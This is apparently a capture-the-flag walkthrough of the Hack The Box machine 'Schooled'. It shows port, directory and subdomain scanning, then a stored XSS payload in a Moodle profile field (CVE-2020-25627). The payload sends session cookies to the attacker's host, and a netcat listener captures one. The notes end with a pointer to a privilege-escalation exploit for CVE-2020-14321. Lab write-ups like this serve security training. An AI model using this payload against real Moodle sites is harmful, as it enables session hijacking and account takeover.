$ echo "10.10.10.234 schooled.htb" | sudo tee -a /etc/hosts
$ sudo nmap -p- -T4 -A 10.10.10.234
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 11:16 EDT
Nmap scan report for 10.10.10.234
Host is up (0.026s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open http Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
$ dirb http://10.10.10.234
---- Scanning URL: http://10.10.10.234/ ----
==> DIRECTORY: http://10.10.10.234/css/
==> DIRECTORY: http://10.10.10.234/fonts/
==> DIRECTORY: http://10.10.10.234/images/
http://10.10.10.234/index.html (CODE:200|SIZE:20750)
==> DIRECTORY: http://10.10.10.234/js/
---- Entering directory: http://10.10.10.234/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.234/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.234/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.234/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
$ nikto -h http://10.10.10.234
Server: Apache/2.4.46 (FreeBSD) PHP/7.4.15
The anti-clickjacking X-Frame-Options header is not present.
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
No CGI Directories found (use '-C all' to force check all possible dirs)
Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE
OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
OSVDB-3268: /css/: Directory indexing found.
OSVDB-3092: /css/: This might be interesting…
OSVDB-3268: /images/: Directory indexing found.
7864 requests: 0 error(s) and 8 item(s) reported on remote host
$ whatweb schooled.htb
http://schooled.htb [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], Email[#,admissions@schooled.htb], HTML5, HTTPServer[FreeBSD][Apache/2.4.46 (FreeBSD) PHP/7.4.15], IP[10.10.10.234], PHP[7.4.15], Script, Title[Schooled - A new kind of educational institute], X-UA-Compatible[IE=edge]
On web pages:
admissions@schooled.htb
Jane Higgins Scientific Research Lecturer
Lianne Carter Manager & English Lecturer
Manuel Phillips Mathematics Lecturer
Jamie Borham Information Technology Lecturer
All content will be delivered over Moodle.
$ gobuster -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt vhost -u http://schooled.htb -o subdomain_schooled.htb
Found: moodle.schooled.htb (Status: 200) [Size: 84]
$ ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://schooled.htb -H "Host: FUZZ.schooled.htb" -fw 5338
moodle [Status: 200, Size: 84, Words: 5, Lines: 2]
$ echo "10.10.10.234 moodle.schooled.htb" | sudo tee -a /etc/hosts
CVE-2020-25627 the moodlenet profile field is vulnerable to stored XSS https://moodle.org/mod/forum/discuss.php?d=410839
Session Hijack
<script>new Image().src="http://10.10.14.149/bogus.php?output="+document.cookie;</script>
add it into MoodleNet profile
kali@kali:~/0.htb/machines/Schooled234$ nc -lnvp 80
listening on [any] 80 ...
listening on [any] 80 ...
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.234] 55198
GET /bogus.php?output=MoodleSession=go8f0r3ct801atmtrd6aicpegd HTTP/1.1
Host: 10.10.14.149
User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://moodle.schooled.htb/moodle/user/profile.php?id=29
Moodle privesc to manager
CVE-2020-14321
https://github.com/HoangKien1020/CVE-2020-14321
{https://vimeo.com/441698193}